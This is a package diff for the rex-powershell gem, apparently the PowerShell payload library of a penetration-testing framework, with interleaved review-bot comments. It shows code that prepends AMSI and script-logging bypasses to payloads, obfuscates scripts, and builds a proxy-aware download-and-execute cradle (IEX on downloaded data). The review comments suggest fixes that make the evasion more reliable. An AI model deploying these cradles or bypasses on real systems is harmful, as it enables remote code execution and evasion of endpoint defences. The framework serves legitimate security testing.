rex-powershell 0.1.82 → 0.1.83
- checksums.yaml +5 -5
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/lib/rex/powershell/command.rb +7 -3
- data/lib/rex/powershell/psh_methods.rb +17 -3
- data/lib/rex/powershell/version.rb +1 -1
- metadata +79 -74
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
|
-
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
2
|
+
SHA256:
|
|
3
|
+
metadata.gz: 421ac28e512865c91044739b0da3ab0760e80c4f4df966cbf39a935c1d083f3c
|
|
4
|
+
data.tar.gz: d5e958eaa5539f183d67543b3feaa4b9f489f2868882032cb43d6d9f30f82668
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: a545a48c3e0515cd897155304736db6749877453abc5fc07e9c3e7cc84ef6417e5bda0a2523ec0e43dc9ff93dc40fecb31f004f5a84bfca75e6cb7b34f8f5946
|
|
7
|
+
data.tar.gz: 4c1ae7b605031e7cbe433b62a1a916d5bdef4322910035929baa3982de6a247a1133e11a747cf06dd35f110ed752fa62150199885afa1318c59efc30c2c5cfea
|
checksums.yaml.gz.sig
CHANGED
|
Binary file
|
data.tar.gz.sig
CHANGED
|
Binary file
|
|
@@ -316,11 +316,13 @@ EOS
|
|
|
316
316
|
end
|
|
317
317
|
end
|
|
318
318
|
|
|
319
|
+
compressed_payload = compress_script(psh_payload, nil, opts)
|
|
320
|
+
|
|
319
321
|
if opts[:prepend_protections_bypass]
|
|
320
|
-
|
|
322
|
+
bypass_amsi = Rex::Powershell::PshMethods.bypass_powershell_protections
|
|
323
|
+
compressed_payload = bypass_amsi + ";" + compressed_payload
|
|
321
324
|
end
|
|
322
325
|
|
|
323
|
-
compressed_payload = compress_script(psh_payload, nil, opts)
|
|
324
326
|
encoded_payload = encode_script(psh_payload, opts)
|
|
325
327
|
|
|
326
328
|
# This branch is probably never taken...
|
|
@@ -372,7 +374,9 @@ EOS
|
|
|
372
374
|
end
|
|
373
375
|
psh_command = generate_psh_command_line(command_args)
|
|
374
376
|
|
|
375
|
-
if opts[:
|
|
377
|
+
if opts[:exec_in_place] and (not opts[:encode_final_payload] and not opts[:encode_inner_payload])
|
|
378
|
+
command = final_payload
|
|
379
|
+
elsif opts[:remove_comspec]
|
|
376
380
|
command = psh_command
|
|
377
381
|
else
|
|
378
382
|
command = "%COMSPEC% /b /c start /b /min #{psh_command}"
|
|
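Review bot: In the first hunk (new lines 319–324) the protections bypass is prepended only to `compressed_payload`, while the unchanged line 326 still builds `encoded_payload` from the untouched `psh_payload`, so any later branch that selects the encoded form emits a payload without the bypass even when `opts[:prepend_protections_bypass]` is set; the branch selection and the start of the enclosing method lie outside this hunk, so either confirm that is intended or apply the prefix to `psh_payload` before both `compress_script` and `encode_script` are called. The new local is named `bypass_amsi`, but `bypass_powershell_protections` also emits the script-block-logging bypass (see the psh_methods.rb hunk), so `protections_bypass` would describe the value accurately. The concatenation on new line 323 would also read more idiomatically as `compressed_payload = "#{protections_bypass};#{compressed_payload}"`.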
@@ -124,12 +124,12 @@ module Powershell
|
|
|
124
124
|
#
|
|
125
125
|
# @return [String] PowerShell code to disable PowerShell Built-In Protections
|
|
126
126
|
def self.bypass_powershell_protections()
|
|
127
|
-
%Q{
|
|
127
|
+
uglify_ps(%Q{
|
|
128
128
|
If($PSVersionTable.PSVersion.Major -ge 3){
|
|
129
129
|
#{self.bypass_script_log}
|
|
130
130
|
#{self.bypass_amsi}
|
|
131
131
|
}
|
|
132
|
-
}
|
|
132
|
+
})
|
|
133
133
|
end
|
|
134
134
|
|
|
135
135
|
#
|
|
@@ -147,6 +147,14 @@ module Powershell
|
|
|
147
147
|
end
|
|
148
148
|
end
|
|
149
149
|
|
|
150
|
+
#
|
|
151
|
+
# Force use of TLS1.2
|
|
152
|
+
#
|
|
153
|
+
# @ return [String] Powershell code to force use of TLS1.2
|
|
154
|
+
def self.force_tls12()
|
|
155
|
+
%Q^[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;^
|
|
156
|
+
end
|
|
157
|
+
|
|
150
158
|
#
|
|
151
159
|
# Use the default system web proxy and credentials to download a URL
|
|
152
160
|
# as a string and execute the contents as PowerShell
|
|
@@ -158,15 +166,21 @@ module Powershell
|
|
|
158
166
|
def self.proxy_aware_download_and_exec_string(url, iex = true)
|
|
159
167
|
var = Rex::Text.rand_text_alpha(1)
|
|
160
168
|
cmd = "$#{var}=new-object net.webclient;"
|
|
169
|
+
cmd << "if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null){"
|
|
161
170
|
cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
|
|
162
171
|
cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
|
|
172
|
+
cmd << "};"
|
|
163
173
|
if iex
|
|
164
|
-
cmd << "IEX $#{var}.
|
|
174
|
+
cmd << "IEX ([System.Text.Encoding]::ASCII.GetString($#{var}.downloaddata('#{url}')));"
|
|
165
175
|
else
|
|
166
176
|
cmd << "&([scriptblock]::create($#{var}.downloadstring('#{url}'));"
|
|
167
177
|
end
|
|
168
178
|
cmd
|
|
169
179
|
end
|
|
180
|
+
|
|
181
|
+
def self.uglify_ps(script)
|
|
182
|
+
return script.gsub(/\ +/, " ").gsub(/\n+/, '')
|
|
183
|
+
end
|
|
170
184
|
end
|
|
171
185
|
end
|
|
172
186
|
end
|
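Review bot: `uglify_ps` (new lines 181–183) deletes newlines outright with `gsub(/\n+/, '')` rather than replacing them with a statement separator, so two statements separated only by a line break are fused into one and the script stops parsing; the one visible caller, `bypass_powershell_protections`, now runs the interpolated `bypass_script_log` and `bypass_amsi` fragments through it, and whether every line of those fragments ends in `;` and contains no `#` line comment (which after joining would swallow the rest of the script) cannot be seen from this hunk. Joining on `;` keeps the boundaries intact — `script.gsub(/ +/, ' ').split("\n").map(&:strip).reject(&:empty?).join(';')` — since PowerShell, as far as I know, tolerates repeated `;`; note also that the space-collapsing pass rewrites runs of spaces inside any quoted string literal in the template, which is worth checking against those fragments. Separately, new line 174 decodes the downloaded bytes with `[System.Text.Encoding]::ASCII.GetString`, so a script served with a UTF-8 BOM or any non-ASCII byte arrives with `?` substitutions and `IEX` either fails or silently corrupts string literals, while the `else` branch still uses `downloadstring`; `[System.Text.Encoding]::UTF8.GetString` would be the safer default if the served scripts are UTF-8, which this hunk does not show.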
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: rex-powershell
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.1.
|
|
4
|
+
version: 0.1.83
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- David 'thelightcosine' Maloney
|
|
@@ -10,85 +10,90 @@ bindir: exe
|
|
|
10
10
|
cert_chain:
|
|
11
11
|
- |
|
|
12
12
|
-----BEGIN CERTIFICATE-----
|
|
13
|
-
|
|
14
|
-
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
20
|
-
|
|
21
|
-
|
|
22
|
-
|
|
23
|
-
|
|
24
|
-
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
28
|
-
|
|
29
|
-
|
|
30
|
-
|
|
31
|
-
|
|
13
|
+
MIIDtzCCAp+gAwIBAgIQDOfg5RfYRv6P5WD8G/AwOTANBgkqhkiG9w0BAQUFADBl
|
|
14
|
+
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
|
15
|
+
d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv
|
|
16
|
+
b3QgQ0EwHhcNMDYxMTEwMDAwMDAwWhcNMzExMTEwMDAwMDAwWjBlMQswCQYDVQQG
|
|
17
|
+
EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl
|
|
18
|
+
cnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgQ0EwggEi
|
|
19
|
+
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCtDhXO5EOAXLGH87dg+XESpa7c
|
|
20
|
+
JpSIqvTO9SA5KFhgDPiA2qkVlTJhPLWxKISKityfCgyDF3qPkKyK53lTXDGEKvYP
|
|
21
|
+
mDI2dsze3Tyoou9q+yHyUmHfnyDXH+Kx2f4YZNISW1/5WBg1vEfNoTb5a3/UsDg+
|
|
22
|
+
wRvDjDPZ2C8Y/igPs6eD1sNuRMBhNZYW/lmci3Zt1/GiSw0r/wty2p5g0I6QNcZ4
|
|
23
|
+
VYcgoc/lbQrISXwxmDNsIumH0DJaoroTghHtORedmTpyoeb6pNnVFzF1roV9Iq4/
|
|
24
|
+
AUaG9ih5yLHa5FcXxH4cDrC0kqZWs72yl+2qp/C3xag/lRbQ/6GW6whfGHdPAgMB
|
|
25
|
+
AAGjYzBhMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
|
|
26
|
+
BBRF66Kv9JLLgjEtUYunpyGd823IDzAfBgNVHSMEGDAWgBRF66Kv9JLLgjEtUYun
|
|
27
|
+
pyGd823IDzANBgkqhkiG9w0BAQUFAAOCAQEAog683+Lt8ONyc3pklL/3cmbYMuRC
|
|
28
|
+
dWKuh+vy1dneVrOfzM4UKLkNl2BcEkxY5NM9g0lFWJc1aRqoR+pWxnmrEthngYTf
|
|
29
|
+
fwk8lOa4JiwgvT2zKIn3X/8i4peEH+ll74fg38FnSbNd67IJKusm7Xi+fT8r87cm
|
|
30
|
+
NW1fiQG2SVufAQWbqz0lwcy2f8Lxb4bG+mRo64EtlOtCt/qMHt1i8b5QZ7dsvfPx
|
|
31
|
+
H2sMNgcWfzd8qVttevESRmCD1ycEvkvOl77DZypoEd+A5wwzZr8TDRRu838fYxAe
|
|
32
|
+
+o0bJW1sj6W3YQGx0qMmoRBxna3iw/nDmVG3KwcIzi7mULKn+gpFL6Lw8g==
|
|
32
33
|
-----END CERTIFICATE-----
|
|
33
34
|
- |
|
|
34
35
|
-----BEGIN CERTIFICATE-----
|
|
35
|
-
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
-
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
52
|
-
|
|
53
|
-
|
|
54
|
-
|
|
55
|
-
|
|
56
|
-
|
|
57
|
-
|
|
58
|
-
|
|
59
|
-
|
|
36
|
+
MIIFMDCCBBigAwIBAgIQBAkYG1/Vu2Z1U0O1b5VQCDANBgkqhkiG9w0BAQsFADBl
|
|
37
|
+
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
|
38
|
+
d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv
|
|
39
|
+
b3QgQ0EwHhcNMTMxMDIyMTIwMDAwWhcNMjgxMDIyMTIwMDAwWjByMQswCQYDVQQG
|
|
40
|
+
EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl
|
|
41
|
+
cnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQgSUQgQ29kZSBT
|
|
42
|
+
aWduaW5nIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA+NOzHH8O
|
|
43
|
+
Ea9ndwfTCzFJGc/Q+0WZsTrbRPV/5aid2zLXcep2nQUut4/6kkPApfmJ1DcZ17aq
|
|
44
|
+
8JyGpdglrA55KDp+6dFn08b7KSfH03sjlOSRI5aQd4L5oYQjZhJUM1B0sSgmuyRp
|
|
45
|
+
wsJS8hRniolF1C2ho+mILCCVrhxKhwjfDPXiTWAYvqrEsq5wMWYzcT6scKKrzn/p
|
|
46
|
+
fMuSoeU7MRzP6vIK5Fe7SrXpdOYr/mzLfnQ5Ng2Q7+S1TqSp6moKq4TzrGdOtcT3
|
|
47
|
+
jNEgJSPrCGQ+UpbB8g8S9MWOD8Gi6CxR93O8vYWxYoNzQYIH5DiLanMg0A9kczye
|
|
48
|
+
n6Yzqf0Z3yWT0QIDAQABo4IBzTCCAckwEgYDVR0TAQH/BAgwBgEB/wIBADAOBgNV
|
|
49
|
+
HQ8BAf8EBAMCAYYwEwYDVR0lBAwwCgYIKwYBBQUHAwMweQYIKwYBBQUHAQEEbTBr
|
|
50
|
+
MCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5kaWdpY2VydC5jb20wQwYIKwYBBQUH
|
|
51
|
+
MAKGN2h0dHA6Ly9jYWNlcnRzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJ
|
|
52
|
+
RFJvb3RDQS5jcnQwgYEGA1UdHwR6MHgwOqA4oDaGNGh0dHA6Ly9jcmw0LmRpZ2lj
|
|
53
|
+
ZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmwwOqA4oDaGNGh0dHA6
|
|
54
|
+
Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmww
|
|
55
|
+
TwYDVR0gBEgwRjA4BgpghkgBhv1sAAIEMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8v
|
|
56
|
+
d3d3LmRpZ2ljZXJ0LmNvbS9DUFMwCgYIYIZIAYb9bAMwHQYDVR0OBBYEFFrEuXsq
|
|
57
|
+
CqOl6nEDwGD5LfZldQ5YMB8GA1UdIwQYMBaAFEXroq/0ksuCMS1Ri6enIZ3zbcgP
|
|
58
|
+
MA0GCSqGSIb3DQEBCwUAA4IBAQA+7A1aJLPzItEVyCx8JSl2qB1dHC06GsTvMGHX
|
|
59
|
+
fgtg/cM9D8Svi/3vKt8gVTew4fbRknUPUbRupY5a4l4kgU4QpO4/cY5jDhNLrddf
|
|
60
|
+
RHnzNhQGivecRk5c/5CxGwcOkRX7uq+1UcKNJK4kxscnKqEpKBo6cSgCPC6Ro8Al
|
|
61
|
+
EeKcFEehemhor5unXCBc2XGxDI+7qPjFEmifz0DLQESlE/DmZAwlCEIysjaKJAL+
|
|
62
|
+
L3J+HNdJRZboWR3p+nRka7LrZkPas7CM1ekN3fYBIM6ZMWM9CBoYs4GbT8aTEAb8
|
|
63
|
+
B4H6i9r5gkn3Ym6hU/oSlBiFLpKR6mhsRDKyZqHnGKSaZFHv
|
|
60
64
|
-----END CERTIFICATE-----
|
|
61
65
|
- |
|
|
62
66
|
-----BEGIN CERTIFICATE-----
|
|
63
|
-
|
|
64
|
-
|
|
65
|
-
|
|
66
|
-
|
|
67
|
-
|
|
68
|
-
|
|
69
|
-
|
|
70
|
-
|
|
71
|
-
|
|
72
|
-
|
|
73
|
-
|
|
74
|
-
|
|
75
|
-
|
|
76
|
-
|
|
77
|
-
|
|
78
|
-
|
|
79
|
-
|
|
80
|
-
|
|
81
|
-
|
|
82
|
-
|
|
83
|
-
|
|
84
|
-
|
|
85
|
-
|
|
86
|
-
|
|
87
|
-
|
|
88
|
-
|
|
89
|
-
|
|
67
|
+
MIIFIzCCBAugAwIBAgIQDX9ZkVJ2eNVTlibR5ALyJTANBgkqhkiG9w0BAQsFADBy
|
|
68
|
+
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
|
69
|
+
d3cuZGlnaWNlcnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQg
|
|
70
|
+
SUQgQ29kZSBTaWduaW5nIENBMB4XDTE5MTAxNjAwMDAwMFoXDTIwMTAxOTEyMDAw
|
|
71
|
+
MFowYDELMAkGA1UEBhMCVVMxFjAUBgNVBAgTDU1hc3NhY2h1c2V0dHMxDzANBgNV
|
|
72
|
+
BAcTBkJvc3RvbjETMBEGA1UEChMKUmFwaWQ3IExMQzETMBEGA1UEAxMKUmFwaWQ3
|
|
73
|
+
IExMQzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANHnKegPAghKuZk4
|
|
74
|
+
Gy1jKaZEXbWc4fxioTemv/F1yIYzAjCWP65qjKtyeeFDe4/kJzG9nseF9oa93YBf
|
|
75
|
+
1nyEqxNSZMw/sCAZ87lOl713dRi73uxOoszy2PT5xEB+Q5R6cbzExkWG2zrLdXDr
|
|
76
|
+
so0Bd6VHw+IsAoBBkAq5FrZOJQYGn5VY20xw/2DqtCeoW4QDWyqTnbJmwO9tZrfr
|
|
77
|
+
3Le2crfk2eOgafaPNhLon5uuIKCZsk2YkUSNURSS3M7gosMwU9Gg4JTBi7X5+oww
|
|
78
|
+
rY43dJT28YklxmNVu8o5kJxW4dqLKJLOIgSXZ63nceT/EaCSg7DcofHNcUzejFwb
|
|
79
|
+
M7Zbb2kCAwEAAaOCAcUwggHBMB8GA1UdIwQYMBaAFFrEuXsqCqOl6nEDwGD5LfZl
|
|
80
|
+
dQ5YMB0GA1UdDgQWBBR18CAeMsIEU+0pXal/XXw9LCtMADAOBgNVHQ8BAf8EBAMC
|
|
81
|
+
B4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwdwYDVR0fBHAwbjA1oDOgMYYvaHR0cDov
|
|
82
|
+
L2NybDMuZGlnaWNlcnQuY29tL3NoYTItYXNzdXJlZC1jcy1nMS5jcmwwNaAzoDGG
|
|
83
|
+
L2h0dHA6Ly9jcmw0LmRpZ2ljZXJ0LmNvbS9zaGEyLWFzc3VyZWQtY3MtZzEuY3Js
|
|
84
|
+
MEwGA1UdIARFMEMwNwYJYIZIAYb9bAMBMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8v
|
|
85
|
+
d3d3LmRpZ2ljZXJ0LmNvbS9DUFMwCAYGZ4EMAQQBMIGEBggrBgEFBQcBAQR4MHYw
|
|
86
|
+
JAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBOBggrBgEFBQcw
|
|
87
|
+
AoZCaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0U0hBMkFzc3Vy
|
|
88
|
+
ZWRJRENvZGVTaWduaW5nQ0EuY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQEL
|
|
89
|
+
BQADggEBAFpzR9s7lcYKDzSJucOHztEPj+iSIeCzxEw34NTE9M2AfkYIu82c4r2a
|
|
90
|
+
bzIGmzZWiCGufjOp0gF5xW6sSSJ9n0TqH0nhHhvjtZQkmkGtOBbN1zeYDFS2ozAp
|
|
91
|
+
sljF/g68Y1eYs3NaFf7kQUa6vb6RdjW3J8M9AQ8gthBt7gr/guVxd/gJUYbdDdBX
|
|
92
|
+
cWfJJi/X7GVBOBmmvA43qoKideuhOBrVGBHvIF/yO9p23dIiUrGmW9kxXCSxgute
|
|
93
|
+
JI/W23RbIRksG2pioMhd4dCXq3FLLlkOV1YfCwWixNB+iIhQPPZVaPNfgPhCn4Dt
|
|
94
|
+
DeGjje/qA4fkLtRmOtb9PUBq3ToRDE4=
|
|
90
95
|
-----END CERTIFICATE-----
|
|
91
|
-
date: 2019-
|
|
96
|
+
date: 2019-11-18 00:00:00.000000000 Z
|
|
92
97
|
dependencies:
|
|
93
98
|
- !ruby/object:Gem::Dependency
|
|
94
99
|
name: bundler
|
|
@@ -212,7 +217,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
|
212
217
|
version: '0'
|
|
213
218
|
requirements: []
|
|
214
219
|
rubyforge_project:
|
|
215
|
-
rubygems_version: 2.
|
|
220
|
+
rubygems_version: 2.7.10
|
|
216
221
|
signing_key:
|
|
217
222
|
specification_version: 4
|
|
218
223
|
summary: Rex Powershell Utilities
|
metadata.gz.sig
CHANGED
|
Binary file
|